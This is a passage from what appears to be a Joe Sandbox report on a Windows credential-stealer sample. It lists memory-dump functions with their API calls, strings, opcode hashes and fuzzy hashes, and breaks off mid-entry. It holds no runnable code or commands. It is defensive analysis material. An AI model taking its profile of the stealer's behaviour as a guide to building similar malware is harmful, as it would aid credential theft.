Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0177B930
GetCurrentThread.KERNEL32 ref: 0177B96D
GetCurrentProcess.KERNEL32 ref: 0177B9AA
GetCurrentThreadId.KERNEL32 ref: 0177BA03

Strings

t~9O, xrefs: 0177B8EC

Memory Dump Source

Source File: 00000000.00000002.309138862.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1770000_SecuriteInfo.jbxd

Similarity

API ID: Current$ProcessThread
String ID: t~9O
API String ID: 2063062207-1938914358
Opcode ID: 6ca2162a58a0b78415a6f645919e1969129e2daad70bc7c07f5bd30e3b07ecb1
Instruction ID: 5dbf5688e861bcb43ed22a3e5d58aaed95f55e56b7cc0ae1887be6d0e8578ec4
Opcode Fuzzy Hash: 6ca2162a58a0b78415a6f645919e1969129e2daad70bc7c07f5bd30e3b07ecb1
Instruction Fuzzy Hash: 165154B0905249CFDB10DFA9C588BAEBBF1FF49304F25846AD459A7360C7386885CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0177B8D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0177B930
GetCurrentThread.KERNEL32 ref: 0177B96D
GetCurrentProcess.KERNEL32 ref: 0177B9AA
GetCurrentThreadId.KERNEL32 ref: 0177BA03

Strings

t~9O, xrefs: 0177B8EC

Memory Dump Source

Source File: 00000000.00000002.309138862.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1770000_SecuriteInfo.jbxd

Similarity

API ID: Current$ProcessThread
String ID: t~9O
API String ID: 2063062207-1938914358
Opcode ID: a7c2e988bce4c4724b71d2e72cb3231576dae0d08fe365e789896acaa1683d68
Instruction ID: 38b50a2dc67903ac6c6237c537a96c6607dc6dea15f676a8c4e2ee465b407209
Opcode Fuzzy Hash: a7c2e988bce4c4724b71d2e72cb3231576dae0d08fe365e789896acaa1683d68
Instruction Fuzzy Hash: F15133B09012498FDB14DFA9C548B9EBBF1EF88314F24846AE459A7350D7386845CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 017798D0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 194
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 01779B16

Strings

`BXm4s, xrefs: 01779A4E, 01779A73
t~9O, xrefs: 01779ACF

Memory Dump Source

Source File: 00000000.00000002.309138862.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1770000_SecuriteInfo.jbxd

Similarity

API ID: HandleModule
String ID: `BXm4s$t~9O
API String ID: 4139908857-2490790541
Opcode ID: e371064b02ca325462e2e6fdd9026538b3aace17282d506b536530ebe2fbd36b
Instruction ID: 4ba4dd691e15ce1878b8742d65f491b9046fc8f3418d89adb9f234ee332121c2
Opcode Fuzzy Hash: e371064b02ca325462e2e6fdd9026538b3aace17282d506b536530ebe2fbd36b
Instruction Fuzzy Hash: 667115B0A01B068FDB24DF2AD04479AFBF1BF88218F00892ED58AD7A50D774E845CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0177FD40 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0177FF0A

Strings

t~9O, xrefs: 0177FE26
t~9O, xrefs: 0177FE46

Memory Dump Source

Source File: 00000000.00000002.309138862.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1770000_SecuriteInfo.jbxd

Similarity

API ID: CreateWindow
String ID: t~9O$t~9O
API String ID: 716092398-1476228867
Opcode ID: 1a53bd30a182bf96df1f09e05f3e718ca9ddfd3d129dc58ac8acd00648785e9f
Instruction ID: d45a8d1b51798204e6497dc9ff69e17caf5df81723dbb568c8a4926df60c3883
Opcode Fuzzy Hash: 1a53bd30a182bf96df1f09e05f3e718ca9ddfd3d129dc58ac8acd00648785e9f
Instruction Fuzzy Hash: 96615B71808388EFCF02CFA9C850ADDBFB1BF4A304F19859AE844AB262C7759855DF51

Uniqueness

Uniqueness Score: -1.00%

Function 0177FDED Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 114
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0177FF0A

Strings

t~9O, xrefs: 0177FE26
t~9O, xrefs: 0177FE46

Memory Dump Source

Source File: 00000000.00000002.309138862.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1770000_SecuriteInfo.jbxd

Similarity

API ID: CreateWindow
String ID: t~9O$t~9O
API String ID: 716092398-1476228867
Opcode ID: d8f4bd2378a5be557e0d6099eb7805c326d64946408d20556d422652a4e2b27f
Instruction ID: 520ca57577e7b85a607846bc7cc3857f338983d490a7cff64f132571023f05f5
Opcode Fuzzy Hash: d8f4bd2378a5be557e0d6099eb7805c326d64946408d20556d422652a4e2b27f
Instruction Fuzzy Hash: D251CEB1D003499FDF14CFA9C984ADEFBB1BF49314F25862AE819AB210D7749985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0177FDF8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0177FF0A

Strings

t~9O, xrefs: 0177FE26
t~9O, xrefs: 0177FE46

Memory Dump Source

Source File: 00000000.00000002.309138862.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1770000_SecuriteInfo.jbxd

Similarity

API ID: CreateWindow
String ID: t~9O$t~9O
API String ID: 716092398-1476228867
Opcode ID: 47f6f6f3d725b9744eece5e166a0e20aa5e658ffa79ab94057589dfa55e1f071
Instruction ID: 6548c3f3b4fc7439735676f517c38ecbb599558735a6cc7c8d5e3e9b2fd45760
Opcode Fuzzy Hash: 47f6f6f3d725b9744eece5e166a0e20aa5e658ffa79ab94057589dfa55e1f071
Instruction Fuzzy Hash: 9E41C0B1D003099FDF14CF99C984ADEFBB5BF48314F24812AE819AB210D7749985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0177BAF0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0177BB7F

Strings

t~9O, xrefs: 0177BB17

Memory Dump Source

Source File: 00000000.00000002.309138862.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1770000_SecuriteInfo.jbxd

Similarity

API ID: DuplicateHandle
String ID: t~9O
API String ID: 3793708945-1938914358
Opcode ID: 199151dfae9457b1519f6368be38915c7503f37a14f03f11fe6ed98ce0c7a7a0
Instruction ID: 5e551435cda1a7c5ebc86cb6af81f54f23a1117c59bef56940b03440f77ddf09
Opcode Fuzzy Hash: 199151dfae9457b1519f6368be38915c7503f37a14f03f11fe6ed98ce0c7a7a0
Instruction Fuzzy Hash: 7221F4B59012489FDF10CFA9D484AEEFBF4FB48320F15842AE954A7310C378A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01779500 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01779B91,00000800,00000000,00000000), ref: 01779DA2

Strings

t~9O, xrefs: 01779D57

Memory Dump Source

Source File: 00000000.00000002.309138862.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1770000_SecuriteInfo.jbxd

Similarity

API ID: LibraryLoad
String ID: t~9O
API String ID: 1029625771-1938914358
Opcode ID: 5e14c13de3bfeb41adc9c4d71aa7eca317efbc3dc293d113ecc66b7e5d09b09f
Instruction ID: 6e8653a3251978749504df74a6bff64455f0ca1068c9623d97e435d33a6f47fb
Opcode Fuzzy Hash: 5e14c13de3bfeb41adc9c4d71aa7eca317efbc3dc293d113ecc66b7e5d09b09f
Instruction Fuzzy Hash: 362135B68052488FDB10CFAAC484ADEFBF4EF89324F15846ED515A7200C379A985CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0177BAF8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0177BB7F

Strings

t~9O, xrefs: 0177BB17

Memory Dump Source

Source File: 00000000.00000002.309138862.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1770000_SecuriteInfo.jbxd

Similarity

API ID: DuplicateHandle
String ID: t~9O
API String ID: 3793708945-1938914358
Opcode ID: 6852c30177f6504e8b98000c3432ad14d73a72a6d53794dbef4d6c6da7b9b0e7
Instruction ID: 95523aff320a651e38a3d07fbe7a89433843525e626995d1f0349d7ff30b03b9
Opcode Fuzzy Hash: 6852c30177f6504e8b98000c3432ad14d73a72a6d53794dbef4d6c6da7b9b0e7
Instruction Fuzzy Hash: 0921C4B5D012489FDB10CFA9D484AEEFBF4FB48324F15841AE915A7350D378A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01779D30 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01779B91,00000800,00000000,00000000), ref: 01779DA2

Strings

t~9O, xrefs: 01779D57

Memory Dump Source

Source File: 00000000.00000002.309138862.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1770000_SecuriteInfo.jbxd

Similarity

API ID: LibraryLoad
String ID: t~9O
API String ID: 1029625771-1938914358
Opcode ID: 2ddada9201cd3174b42ee8ab81bb21766fbbc031a4aa224aa384a5000fbf3645
Instruction ID: d6ef1479040b6fb0a3112aa19a8943d7a54f967fb382447fccb140bace96ffc9
Opcode Fuzzy Hash: 2ddada9201cd3174b42ee8ab81bb21766fbbc031a4aa224aa384a5000fbf3645
Instruction Fuzzy Hash: 7B21F2B6C012489FDF10CF9AC484ADEFBF4EB89324F15846ED955A7210C379A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0177950C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01779B91,00000800,00000000,00000000), ref: 01779DA2

Strings

t~9O, xrefs: 01779D57

Memory Dump Source

Source File: 00000000.00000002.309138862.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1770000_SecuriteInfo.jbxd

Similarity

API ID: LibraryLoad
String ID: t~9O
API String ID: 1029625771-1938914358
Opcode ID: 3dd0a3ad4e9de9d69b64f90bf819fd4706941e89f23cf640c92f240ea51b5528
Instruction ID: 95fec5afcdf0f7e21bdd8ca647cee640c8bbcc5214137264171b71eb41e1e47f
Opcode Fuzzy Hash: 3dd0a3ad4e9de9d69b64f90bf819fd4706941e89f23cf640c92f240ea51b5528
Instruction Fuzzy Hash: 091103B69012489FDB10CF9AC444ADEFBF4EB89324F15842ED515A7200C379A985CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01779AB0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 01779B16

Strings

t~9O, xrefs: 01779ACF

Memory Dump Source

Source File: 00000000.00000002.309138862.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1770000_SecuriteInfo.jbxd

Similarity

API ID: HandleModule
String ID: t~9O
API String ID: 4139908857-1938914358
Opcode ID: c9a3ff801c75d2ad9d5e74afac7b39bf5b506f51c3f867344fb96a1e09fbb263
Instruction ID: ae12b582d3f762e62a432f0c2659085a7c3fb2495c83a84a1e396cb744cfaa21
Opcode Fuzzy Hash: c9a3ff801c75d2ad9d5e74afac7b39bf5b506f51c3f867344fb96a1e09fbb263
Instruction Fuzzy Hash: 3D110FB6C012498FDB10CF9AC444BDEFBF5EB89224F15842AD529B7210C378A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 076453C8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,01746190,?,?,?,?,?,?,?,07649950,00000000,?,00000000), ref: 07649AFD

Strings

t~9O, xrefs: 07649ABA

Memory Dump Source

Source File: 00000000.00000002.335506351.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7640000_SecuriteInfo.jbxd

Similarity

API ID: Timer
String ID: t~9O
API String ID: 2870079774-1938914358
Opcode ID: 13d3ef0e133074374b1a64e0e1511721c0a9742c95724e243d9d183cd9006c67
Instruction ID: 96e81b5cb0bd1a50053f399f89d25b0e83acc05b77211113a1468d288e06bab7
Opcode Fuzzy Hash: 13d3ef0e133074374b1a64e0e1511721c0a9742c95724e243d9d183cd9006c67
Instruction Fuzzy Hash: E911F2B59003499FCB10DF99C489BDFBBF8EB49324F10841AE555A7700C379A984CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0146D4A0 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.308154320.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_146d000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5bba8f364d182e6afa3b15e638989d0ba714c0c76a113783d7261e9ecfc912d
Instruction ID: 13fbb3ae2462b06ceca7ff2647bfc9d15d5bd0f6e988aed76736ae01c8b1188b
Opcode Fuzzy Hash: a5bba8f364d182e6afa3b15e638989d0ba714c0c76a113783d7261e9ecfc912d
Instruction Fuzzy Hash: C52136B1A04240DFDB15DF44D8C0B27BF69FB8832CF24856AE9454B626C336D846CBA3

Uniqueness

Uniqueness Score: -1.00%

Function 0147D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.308230741.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_147d000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58b6169be0d299c8042e405db0ba6c1737aa0edcdd276ca623cc97e9e1a9e374
Instruction ID: 2a0afc2708f5bc2711eaace469d79506ed4e9196fed15a65abe5e6d6b2ed4ba2
Opcode Fuzzy Hash: 58b6169be0d299c8042e405db0ba6c1737aa0edcdd276ca623cc97e9e1a9e374
Instruction Fuzzy Hash: 77213771A14200DFDB05DF94D9C0B66BBA5FF84324F24C96EE9094B366C336D847CA61

Uniqueness

Uniqueness Score: -1.00%

Function 0147D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.308230741.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_147d000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d95eea5e0ea54d80ff79221fd2917140b35184fa752e29aa8eedca30bb710b2c
Instruction ID: f493a53f121ef312ccb408e8afa7e908bac5fc1a28c8838fafcdd25612e6fea4
Opcode Fuzzy Hash: d95eea5e0ea54d80ff79221fd2917140b35184fa752e29aa8eedca30bb710b2c
Instruction Fuzzy Hash: 332167B5904280DFDB16DF54D8C0B62BBA1FF84358F24C56ED90A4B356C33AD807CAA2

Uniqueness

Uniqueness Score: -1.00%

Function 0147D006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.308230741.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_147d000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 301a6e72c28a2daae9523ecf55b36c1b37a37a36f3f4a8f6ca91a8aecc6daf1b
Instruction ID: 6fd368c14c8ab1a31b080504499b382dbd4d02a764e13ae6bc102c5578d2a38f
Opcode Fuzzy Hash: 301a6e72c28a2daae9523ecf55b36c1b37a37a36f3f4a8f6ca91a8aecc6daf1b
Instruction Fuzzy Hash: C4217F755093C08FCB13CF24D990756BF71EF46214F28C5DAD8498B667C33A984ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0146D49B Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.308154320.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_146d000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17894ca1eab804f1555070659dd00dfff87542e61665d1c8f73af2d5ff09c7fa
Instruction ID: 6e8b55ca7b59c3b88364f523360395244cded05ccd4ce6bccc9a77e3b577fd95
Opcode Fuzzy Hash: 17894ca1eab804f1555070659dd00dfff87542e61665d1c8f73af2d5ff09c7fa
Instruction Fuzzy Hash: 9111B176904280CFDB12CF54D5C4B56BF71FB84328F2886AAD9454B727C336D456CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0147D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.308230741.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_147d000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d58ca62981777cd3cbf56bb22269b8e21f4586939eb6954d17036f4794f2a560
Instruction ID: f58be0cd1855bc1cbd8b936a632c92fe82c3aaac68a6120f0371542a58a87501
Opcode Fuzzy Hash: d58ca62981777cd3cbf56bb22269b8e21f4586939eb6954d17036f4794f2a560
Instruction Fuzzy Hash: 1A11A975904280DFCB12CF54C5C0B56BBA1FB84224F28C6AAD8494B766C33AD44ACB61

Uniqueness

Uniqueness Score: -1.00%

Function 0146D745 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.308154320.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_146d000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00eb7d4e4f506eea969f0a4397bf30a40883475b6272f9d351078937838fb5a2
Instruction ID: 376b8db4f5f8494c0f0828c44cb685c5780e0656cf93e0e5cde9d1645f635ed8
Opcode Fuzzy Hash: 00eb7d4e4f506eea969f0a4397bf30a40883475b6272f9d351078937838fb5a2
Instruction Fuzzy Hash: 9E014771A083C09AE7108E69CCC4B67BB9CEF4127DF08812BEA440B356C33D9840CAB3

Uniqueness

Uniqueness Score: -1.00%

Function 0146D744 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.308154320.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_146d000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77f3fc2c3f7f21135ae056fb5e9c842da643b3ad6aefce6b1ee92f17ea6d38ce
Instruction ID: 7d296b1ed6523eff2469dce84c37baf6936f8cab4de13c62ea5561d0e141c872
Opcode Fuzzy Hash: 77f3fc2c3f7f21135ae056fb5e9c842da643b3ad6aefce6b1ee92f17ea6d38ce
Instruction Fuzzy Hash: 75F0C8719042849AE7108E19CC84B63FFACEB41234F18C05AED481B386C37C5844CAB2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0764A758 Relevance: .6, Instructions: 620COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.335506351.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7640000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b09cce145ae107f569b995692cb14cac04e9b4aa6ec5f70a099532bfda92547
Instruction ID: b66a7961ae3fc7326b397f1901a8f216f1c6bd3972d063e20a8c54a251da145d
Opcode Fuzzy Hash: 2b09cce145ae107f569b995692cb14cac04e9b4aa6ec5f70a099532bfda92547
Instruction Fuzzy Hash: F632A3B4A052558FDB24DFB8C8507AEBBF2AF89304F14816DD50AEB384DB349C45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0177E680 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.309138862.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1770000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 840ba74975178958e862427ae41218fcf939c83c27020006a726fd7de9bb4df3
Instruction ID: a1ad70d6a961b62e96dff317da72f090bd8b5e6c3dcf5216669b6e307f7a8dba
Opcode Fuzzy Hash: 840ba74975178958e862427ae41218fcf939c83c27020006a726fd7de9bb4df3
Instruction Fuzzy Hash: C212A4F9611746CBE330CF65E8985893FA1B745338F90C30AD2612BAD9D7B8164ACF85

Uniqueness

Uniqueness Score: -1.00%

Function 0177C1B4 Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.309138862.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1770000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 948491a8d87548869699937cfcca3c4609e593a6201e614eb3b60346b197c414
Instruction ID: 5479551d8df7ccbef7717cf7e0f9912fb6282bfad3ed0aac138aff7e4acfbf12
Opcode Fuzzy Hash: 948491a8d87548869699937cfcca3c4609e593a6201e614eb3b60346b197c414
Instruction Fuzzy Hash: 3FA16C36E0061ACFCF16DFA5C84459EFBB2FF88300F15856AE905AB225EB71E905CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0177E670 Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.309138862.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1770000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 568d968e78b5d2aff9d233dff1ed61f7e6f9c4156a839c7ad3a91e071a1e2028
Instruction ID: be13d017e52f1d124a322109f35b5a2e247c6319f09a23d0f54954f113cf9d29
Opcode Fuzzy Hash: 568d968e78b5d2aff9d233dff1ed61f7e6f9c4156a839c7ad3a91e071a1e2028
Instruction Fuzzy Hash: 0BC13DB9611745CBD720CF64E8985897FB1FB85338F51C30AD2612BAD8D7B8164ACF84

Uniqueness

Uniqueness Score: -1.00%

Function 0764B328 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000003B), ref: 0764B386
GetSystemMetrics.USER32(0000003C), ref: 0764B3C0

Strings

t~9O, xrefs: 0764B34F

Memory Dump Source

Source File: 00000000.00000002.335506351.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7640000_SecuriteInfo.jbxd

Similarity

API ID: MetricsSystem
String ID: t~9O
API String ID: 4116985748-1938914358
Opcode ID: fd8216f0678e87c6582d1791b81c27421bd65dbb16cef9202ad14386dbc07a9f
Instruction ID: 297d9f2be349866a72cf16a2099d4d7425776ff05c4b850d3ecb3451cb2d8563
Opcode Fuzzy Hash: fd8216f0678e87c6582d1791b81c27421bd65dbb16cef9202ad14386dbc07a9f
Instruction Fuzzy Hash: D52146B08003498FCB11CFAAD0487DEBFF4EF49318F14884AD559AB740C3796945CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0764B400 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000022), ref: 0764B45E
GetSystemMetrics.USER32(00000023), ref: 0764B498

Strings

t~9O, xrefs: 0764B427

Memory Dump Source

Source File: 00000000.00000002.335506351.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7640000_SecuriteInfo.jbxd

Similarity

API ID: MetricsSystem
String ID: t~9O
API String ID: 4116985748-1938914358
Opcode ID: 975d79485e3a0beb009799645ccfa2b1ee2834f192812760c85a30ec1b4529be
Instruction ID: c4a7863fb55afdea19fcb49b9c92d9d5d14b71f59485af7bf154eef72d050d57
Opcode Fuzzy Hash: 975d79485e3a0beb009799645ccfa2b1ee2834f192812760c85a30ec1b4529be
Instruction Fuzzy Hash: F42157B08043458FDB20DFAAD0497DEBFF0AB08314F14841ED059A7744C3796588CFA1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exePID: 532, Parent PID: 5996COMMON

Execution Graph

Execution Coverage:	22.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	1.4%
Total number of Nodes:	774
Total number of Limit Nodes:	35

Executed Functions

Function 06955780 Relevance: 2.1, APIs: 1, Instructions: 577libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 06955D69

Memory Dump Source

Source File: 0000000A.00000002.551411606.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6950000_SecuriteInfo.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 511f8da235005596e435ecf087532a6a49aece90b75e2454a277a7162e536dff
Instruction ID: fa73984155440557d939f7addf9f29208a41d11fbb6589b1d468436ede1923eb
Opcode Fuzzy Hash: 511f8da235005596e435ecf087532a6a49aece90b75e2454a277a7162e536dff
Instruction Fuzzy Hash: 9422B230B042058FCB54DBB4D889AAD77F6AF89318F268869E805DB751DF35DC05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 05C98398 Relevance: 3.4, APIs: 2, Instructions: 361COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C98398
KiUserExceptionDispatcher.NTDLL ref: 05C98E10

Memory Dump Source

Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 04b6a9d0bc26af5e016b1f524a1ecb9334d103a00e528a0680c276b632b81719
Instruction ID: 9b6d35097e2746f2eff1c1546bc960a9b07cba720fe21eb2190a52c3d0cb03ba
Opcode Fuzzy Hash: 04b6a9d0bc26af5e016b1f524a1ecb9334d103a00e528a0680c276b632b81719
Instruction Fuzzy Hash: D8129539902218CFDB68DB64D88C79CB7B2BF4A306F1045E9D55AA3350CB356E85CF62

Uniqueness

Uniqueness Score: -1.00%

Function 05C983CF Relevance: 1.9, APIs: 1, Instructions: 357COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C98E10

Memory Dump Source

Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 200295572887393a96125adb1ca593bcadd44f10f0fb35972f6939545f1cdaac
Instruction ID: 0eaa639225f37633dde7982d52e5ac4fb1ff2454ada268cd920290c3150b919e
